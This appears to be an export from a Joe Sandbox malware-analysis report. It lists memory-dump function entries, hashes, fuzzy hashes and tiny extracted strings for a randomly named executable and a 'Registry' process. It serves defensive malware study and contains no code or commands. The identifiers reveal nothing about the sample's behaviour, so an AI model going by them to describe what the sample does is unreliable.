Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36f3ab5dbdaf084776d6d48b80fd8f4fc55825ba6bb0c86efec41ad0412b49d
Instruction ID: b7df44c9ecb1a7e2dab1ab2ece049e9d4fb48eb2e79f3b94f17fc7ca15c64c24
Opcode Fuzzy Hash: e36f3ab5dbdaf084776d6d48b80fd8f4fc55825ba6bb0c86efec41ad0412b49d
Instruction Fuzzy Hash: A2F0C830E1A64E4AFF689BA498A86B976E4FF55304F01057AD41EC74F1EF6417608740

Function 00007FFD9B77BBD2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aaefdfb9af4ae0659cc4c5248267a4a223fd21a170aba9e6c0882cd9297e01a
Instruction ID: a59e51d23713e58282569058a4abc9831ac9f123be9b6180ad5d2f006aeed10e
Opcode Fuzzy Hash: 2aaefdfb9af4ae0659cc4c5248267a4a223fd21a170aba9e6c0882cd9297e01a
Instruction Fuzzy Hash: 0401A170D0561D8EEF60DF94C8A4BEC77F1FB18314F1142A5D409F72A1DBB866848B55

Function 00007FFD9B772719 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 351a387b18d547c303a7b2714f56be4fc87e000027a7bcbbcca2c2d83e9954ef
Instruction ID: 971757c9e0f39b98ce6e8e4eb9eaafce11d6d48192ef75a14de397646385e6e9
Opcode Fuzzy Hash: 351a387b18d547c303a7b2714f56be4fc87e000027a7bcbbcca2c2d83e9954ef
Instruction Fuzzy Hash: C8F06231A0F38D8FDB5A9B6488656B93BB0FF07304F4605BAE429C61F2DB789554C741

Function 00007FFD9B77278D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20bcab6416bca28e4e38413327fe1c7e226b6c7ee1295d5534a15846a327902
Instruction ID: 7730648c6fa22b87c5cd5c02150c4f29481ac366daf8609814962ed55aff60c4
Opcode Fuzzy Hash: d20bcab6416bca28e4e38413327fe1c7e226b6c7ee1295d5534a15846a327902
Instruction Fuzzy Hash: A8F0CD30A0B78E8FEB699FA088651B93BA0FF16300F4205BAD419860F2EB7895548B40

Function 00007FFD9B77BCCC Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b43a8f44066a8da81873f63c039095651d2a6cbb94c853943cb05266d2c471e
Instruction ID: 08e7c10b0fcf024150bd9f3a08040a39454e4005c6391b1fce5dd3289d78986c
Opcode Fuzzy Hash: 4b43a8f44066a8da81873f63c039095651d2a6cbb94c853943cb05266d2c471e
Instruction Fuzzy Hash: 73F01D70A1991D4EDBA4EB58C8A5FA977A1FB58300F1142A6D40DE32A5CE74AA858B40

Function 00007FFD9B770F6B Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a53bc6f024905e1cece6a13e3a7d5b5f16af38f5344f57b50639071842c96c
Instruction ID: b2457e9c8b950da967b38327ae97b368891be5becf7cebd6b9deb5c74e36d8cc
Opcode Fuzzy Hash: 10a53bc6f024905e1cece6a13e3a7d5b5f16af38f5344f57b50639071842c96c
Instruction Fuzzy Hash: 44F01D34A0A50E8EEB24DB44C8A4BED73F1FB58301F1146B5D00AA32A5DE746E408B80

Non-executed Functions

Function 00007FFD9B77F323 Relevance: 7.6, Strings: 6, Instructions: 90COMMON

Download Yara Rule

Strings

-, xrefs: 00007FFD9B77F3AB
[, xrefs: 00007FFD9B77F337
%, xrefs: 00007FFD9B77F455
", xrefs: 00007FFD9B77F3E1
Q, xrefs: 00007FFD9B77F344
Y, xrefs: 00007FFD9B77F3F1

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: "$%$-$Q$Y$[
API String ID: 0-819147419
Opcode ID: 1ff4fc26bf3dad3e2fe8b171f1967aa5e10c4f4d4640e118ffe4ce30ba1ddef4
Instruction ID: 23c85f0bcd393598dcfc7c2c554bea6d355df3a9f1691faba0c8e9b5c1bc0300
Opcode Fuzzy Hash: 1ff4fc26bf3dad3e2fe8b171f1967aa5e10c4f4d4640e118ffe4ce30ba1ddef4
Instruction Fuzzy Hash: 9B41E470E0526E8FDB68DF50C8A47E9B6B2EF59305F0002F9D44DA72A1CB785A84CF41

Function 00007FFD9B77387E Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

.R^I, xrefs: 00007FFD9B773954
/R^I, xrefs: 00007FFD9B773924
0R^I, xrefs: 00007FFD9B773944
8R^, xrefs: 00007FFD9B7738D4

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: .R^I$/R^I$0R^I$8R^
API String ID: 0-1790200200
Opcode ID: 49c5c302ed381eadcf46fa9b7ca7135ef499f8f4b84e806f9f4f10869c05e36f
Instruction ID: 06c04e7edd3630e3bb1bd5fd4e27319edc207169a837faa2b2e4013dd5c9c4a8
Opcode Fuzzy Hash: 49c5c302ed381eadcf46fa9b7ca7135ef499f8f4b84e806f9f4f10869c05e36f
Instruction Fuzzy Hash: 5231914260F7C64FE72242B80C756653FE4EF1313475A02EBD1A8CB0F7E5595A5A83A1

Function 00007FFD9B77F0E3 Relevance: 5.1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

-, xrefs: 00007FFD9B77F3AB
%, xrefs: 00007FFD9B77F455
", xrefs: 00007FFD9B77F3E1
Y, xrefs: 00007FFD9B77F3F1

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: "$%$-$Y
API String ID: 0-2898851251
Opcode ID: 46ec8326a2a47f16657275554bd1543e4ea24f0ab2333bccc6160a2804aabc7a
Instruction ID: 805d6010027a049419f4e28967e827fcaca61ca30068f69daf9d6fe5671f9ba2
Opcode Fuzzy Hash: 46ec8326a2a47f16657275554bd1543e4ea24f0ab2333bccc6160a2804aabc7a
Instruction Fuzzy Hash: F331D670A0566E8FDB68DF54C8A4BE9B7B2EF59301F5002F9D40DA72A1CB785A80CF40

Analysis Process: UplbXNLOfTNXjbhPJQLmKdgT.exePID: 4412, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B76A605 Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23bd06a52a456e9ae081a2ad76a7a63b45b4f44268daf9ecbfb775e2979b4d4c
Instruction ID: 474a4231ac87bc0affded5640cf8c429f29e95a0e31ecccfe7f618f833c6ca80
Opcode Fuzzy Hash: 23bd06a52a456e9ae081a2ad76a7a63b45b4f44268daf9ecbfb775e2979b4d4c
Instruction Fuzzy Hash: 3132AF30A0974E8FDB95EF64C8695B97BF0FF29300F1205BAD419C71B6DA34AA44CB41

Function 00007FFD9B76BDCC Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7302447abee40d9856485b04cf601b27250df18035ed30802f26baa6649172
Instruction ID: 8477b953ad4f7ebdf6ef0d224d971f25fc74f91c8179e9ce7cbab63450280d58
Opcode Fuzzy Hash: 4c7302447abee40d9856485b04cf601b27250df18035ed30802f26baa6649172
Instruction Fuzzy Hash: 4FF1A230E1A64E8FEB65EBB4C8695F97BF0FF19300F1146BAD419C71B2DA34A6448742

Function 00007FFD9B763565 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 084527d89d5e88b74fe1bab78fcd196a413e5fed16c538f7aaccccfbc77b7f3d
Instruction ID: dceadd51da86ae0520887d5c7a8a2569aefc8b75a7ea12dc785d5d5e347f4ec7
Opcode Fuzzy Hash: 084527d89d5e88b74fe1bab78fcd196a413e5fed16c538f7aaccccfbc77b7f3d
Instruction Fuzzy Hash: DE91C271E18A4E8FE794DBACC8657AC7BE1EF65350F5102BAD00AD32D6DB742801C741

Function 00007FFD9B76CC1F Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

%w, xrefs: 00007FFD9B76CCCE

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: %w
API String ID: 0-4253275273
Opcode ID: 1765f87a8e022ca487ff7f1c1c9260bb8357fa8714aadace8112c6ed01499183
Instruction ID: 3cacd98592fcca99ec921905116f31d92a16240ff3f4fa4f50029f377a973e39
Opcode Fuzzy Hash: 1765f87a8e022ca487ff7f1c1c9260bb8357fa8714aadace8112c6ed01499183
Instruction Fuzzy Hash: 4281212BB496668EE31537BCB8254FC7B60EF51335B0902B3E18DCA0E3DE1938458A95

Function 00007FFD9B772B0D Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B772B19

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 4108e0e164b6b4b1a6f892d6cb7c1ba5e0a546e3a82dacd7ef778acb53dab092
Instruction ID: e21b300a51a24a784f2522765fd509a9bb66ea8d91e1b65ee4df3b684554ee81
Opcode Fuzzy Hash: 4108e0e164b6b4b1a6f892d6cb7c1ba5e0a546e3a82dacd7ef778acb53dab092
Instruction Fuzzy Hash: 14415D30E1961E8FDB94EFE8D865AEDB7B1FF58300F100279E019E72A6DE3469418B41

Function 00007FFD9B76C668 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

S_H, xrefs: 00007FFD9B76C673

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: S_H
API String ID: 0-2006091846
Opcode ID: acfabde92c66d1401cf8a57573c3dc74a4ea88d200166eb7cda12e8fd1da5a9d
Instruction ID: 5c95255d4b551a22db74aedcb0f871fac51498d6a9b9f9eec6c5d4efd09c3a3c
Opcode Fuzzy Hash: acfabde92c66d1401cf8a57573c3dc74a4ea88d200166eb7cda12e8fd1da5a9d
Instruction Fuzzy Hash: 67310071E09A1D8FDBA4EBA8D8A56ACB7B1FF59300F51023AD00DD32A1DE3569418B41

Function 00007FFD9B76EBA3 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

+, xrefs: 00007FFD9B76EC76

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: e4de2b21cafe0115f3cfed47651676c2327eb2e80644778a576143428b9158ca
Instruction ID: cfc4346dfa688576ba7bfac34c944b945b81bd4f0909f33bb1fb6699066f1605
Opcode Fuzzy Hash: e4de2b21cafe0115f3cfed47651676c2327eb2e80644778a576143428b9158ca
Instruction Fuzzy Hash: CF31B570E0562D8FDB69DF54C8A1BA9B7B6EB55300F4002EAD04DA72A1DB746F80CF11

Function 00007FFD9B773EF2 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B773F1A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0146f07381910c91d04de35d86c7178e2b18231f43a070d4c75c640dc071ec0b
Instruction ID: b77a8ba6696663bb6073311acc8243a673c9434dd02b86e129575db29f174544
Opcode Fuzzy Hash: 0146f07381910c91d04de35d86c7178e2b18231f43a070d4c75c640dc071ec0b
Instruction Fuzzy Hash: 8911E431A1E68A4EEB52AB7488A86B97BF0EF15301F0605F7D45CC70B7EA74A6048761

Function 00007FFD9B777225 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77723A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 374e3b52adf24e1811369cec0595c7f52c544cb86c55dd2568156f4c7d423c6a
Instruction ID: 9b28e15cc59a52a57916333e3caf973a2afd3305ce9aed6b92910c895fd5b26c
Opcode Fuzzy Hash: 374e3b52adf24e1811369cec0595c7f52c544cb86c55dd2568156f4c7d423c6a
Instruction Fuzzy Hash: C811B430A0964E9FDB58EF64C4696BD7BF0FF18301F0506BEE419C71A6DA74A240CB40

Function 00007FFD9B774AB9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B774ACA

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 6be74a26ce68715214e35958ebf3593149f11411ddc0d7a1079190df2d75fa86
Instruction ID: 53b5f0f302f105fabe81fb5cfc8b1411d02d1682c4a6a8c83144424de4a30227
Opcode Fuzzy Hash: 6be74a26ce68715214e35958ebf3593149f11411ddc0d7a1079190df2d75fa86
Instruction Fuzzy Hash: F2218E30A09A8E8FDB59EF6888696BD3BB0FF19301F0506BFD419C71B6DA78A544C741

Function 00007FFD9B772C61 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B772C7A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: c285362b810ea87be1356f1f4bf55be1c1e5da6108ff5bb5c9efef1e53065476
Instruction ID: e6d3905a931830b0b0aa25c75b4b246209ba55c2516ed44c5a257b2535e58638
Opcode Fuzzy Hash: c285362b810ea87be1356f1f4bf55be1c1e5da6108ff5bb5c9efef1e53065476
Instruction Fuzzy Hash: 3501C830D1A65E8EE791EBB4889C5F97BF0FF1A301F0145B6D418C70B6DA74A244C701

Function 00007FFD9B77735D Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77736A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 4caaba5489e624e75b39e15b1295e227a21a93154f412b2f6f93b794f4a75e29
Instruction ID: 74ccc0b1f4486472fe587c30b224bda356737ca0016e39b29c3dbb2867683bea
Opcode Fuzzy Hash: 4caaba5489e624e75b39e15b1295e227a21a93154f412b2f6f93b794f4a75e29
Instruction Fuzzy Hash: DA110130A09A8E8FEB58EF24C4A56B93BE0FF18300F0101BED81DC71F6DA7465048740

Function 00007FFD9B77535D Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77536A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: cbf3c21d3060953da112db0066d4353c6188b35252819889ef5e03a2376bbc22
Instruction ID: 116394aefdffd677ceaf56f5baa5fa9258fa9b2c1431fa0b3d4791c584122270
Opcode Fuzzy Hash: cbf3c21d3060953da112db0066d4353c6188b35252819889ef5e03a2376bbc22
Instruction Fuzzy Hash: 8511CE30A19A8E8FEB58EF648869AB977E0FF18308F0005BED41DC71F2DAB46600C700

Function 00007FFD9B7714F1 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFD9B77146A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 88223a2aa478164e49ed9168f9431984cb13977bd14be7a3c5a146968242ac89
Instruction ID: 7bd9ab7a889af0cf0abee4ef706505206ebc4b4e495a5b81db63351655312d52
Opcode Fuzzy Hash: 88223a2aa478164e49ed9168f9431984cb13977bd14be7a3c5a146968242ac89
Instruction Fuzzy Hash: D0F0D071A0970D8BDB24DF90C594AED73F1EB50305F21463AC01A9B6F5DAB85A44DB41

Function 00007FFD9B771328 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFD9B77146A

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 815f94cd725dd1c0698ded0c5aac2c373829b0d4a298f6d456b94406c35f6d53
Instruction ID: a1353052e4282c27434fb82234adb9e26101922238c0275b635995e6c6e583a4
Opcode Fuzzy Hash: 815f94cd725dd1c0698ded0c5aac2c373829b0d4a298f6d456b94406c35f6d53
Instruction Fuzzy Hash: E9E0ED35A0970D8FDB28DF90C9E0AED73F1EB50315F21462AC40A9B2E5DAB46A44CB41

Function 00007FFD9B76EF0A Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

g, xrefs: 00007FFD9B76EF24

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 362531d17837e60e135d553d25cc21c1e71e21e5378401ef5fe758cfd62f5299
Instruction ID: 87f89dd7b3a2d279e600b9b70f921311039b1d16d5506e36a08be491c76274e7
Opcode Fuzzy Hash: 362531d17837e60e135d553d25cc21c1e71e21e5378401ef5fe758cfd62f5299
Instruction Fuzzy Hash: B2D0C930A0C61CCFDB65DA44C8A179D73B5AB04300F0001E0D00C972A0CB347F81CF42

Function 00007FFD9B76DC83 Relevance: .5, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B76A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b76a000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9473a5e87855336149ab3b0f33e3821af5c6f33712ed0b1ac376ccca7b77df5c
Instruction ID: 3be780758ce376abf8e38cc572795114a43ff3e5f803daa85a2480427eddfd68
Opcode Fuzzy Hash: 9473a5e87855336149ab3b0f33e3821af5c6f33712ed0b1ac376ccca7b77df5c
Instruction Fuzzy Hash: A2125D71E1965D8FEBA8DBA8C8647F8BBB1FF19300F1401BAD01DD72A6DA346944CB41

Function 00007FFD9B773738 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B771000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B771000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b771000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc5b323b00765d8cf6adbbe8e33cf71625dd9e4d2e5cd0316843e1b6b579914
Instruction ID: c2c3f8089a009aad5c4cbda3d984574cad5b28b3266948a671ca3ea9ba93d107
Opcode Fuzzy Hash: 3cc5b323b00765d8cf6adbbe8e33cf71625dd9e4d2e5cd0316843e1b6b579914
Instruction Fuzzy Hash: A821A421A0E7CA4FE712AB7488A95A97FB0EF16304F0A05FBD458CB0B7D9286604C751

Function 00007FFD9B760525 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d543b191983259210149d284b2adedde1768b0151abf517eb148a27774f66818
Instruction ID: 4628078c43be9508f0246a6c350b4e0d57d4f0dfd2b0b0e36a9d3b20d0d1d28a
Opcode Fuzzy Hash: d543b191983259210149d284b2adedde1768b0151abf517eb148a27774f66818
Instruction Fuzzy Hash: 9CB15947B0F7C64EE72566BC68B55F93F50EFA162470D02F7E0D8890FBDC08695A8292

Function 00007FFD9B7605A0 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dcbcadc6f7279b07d432b50ac75f06e777d737c9467336f8e5dc406e471d2c8
Instruction ID: ac71777b304b50caa69ad387920da9d4d1ccfa5cc86456e4305f00d779ae6e62
Opcode Fuzzy Hash: 4dcbcadc6f7279b07d432b50ac75f06e777d737c9467336f8e5dc406e471d2c8
Instruction Fuzzy Hash: C4915B47B0F7C64EE72566BC68B51F93F50EFA166470D02F7E0D88A0FBEC0469568282

Function 00007FFD9B76060D Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e63093f9c6983fcdf63d14819459b39c61b14ec3f22aa81a7ee6462f6e629f
Instruction ID: b154cd6f16a8779476cfe1be65df8e8c94c8ecac03bd157195a4f66c112e5e57
Opcode Fuzzy Hash: 28e63093f9c6983fcdf63d14819459b39c61b14ec3f22aa81a7ee6462f6e629f
Instruction Fuzzy Hash: BD814A47B0F7C64EE72566BC68751F93F90EFA166470902F7E0D8890FBEC046956C282

Function 00007FFD9B760638 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9224ead59416590d21c0498333fc612e1a72ffffe72f998ad3bc09db94b21a03
Instruction ID: c186d0e81cae8f2b972ebf7b6293ccad7e485f885283eb391df4b753d45838fc
Opcode Fuzzy Hash: 9224ead59416590d21c0498333fc612e1a72ffffe72f998ad3bc09db94b21a03
Instruction Fuzzy Hash: 82816C53B0F7C68EE72566BC68655F93F90EFA176070902F7E0988A0FBEC146955C382

Function 00007FFD9B761698 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c7da2663491591d2586a846f50e2322621770e6a0773c63f6cf82352181b7b6
Instruction ID: f7fb41027e51cbc2b0551a62b37c25bc9e463b369bbf9693f248fed31501ad9e
Opcode Fuzzy Hash: 1c7da2663491591d2586a846f50e2322621770e6a0773c63f6cf82352181b7b6
Instruction Fuzzy Hash: E881CE31B0DB498FDB58DE5C88695AD77E2EFD8300B15427AE45DC32A6DE30AD028782

Function 00007FFD9B760640 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1969447866.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ffd9b760000_UplbXNLOfTNXjbhPJQLmKdgT.jbxd

Similarity

API ID:
String ID:
API String ID:
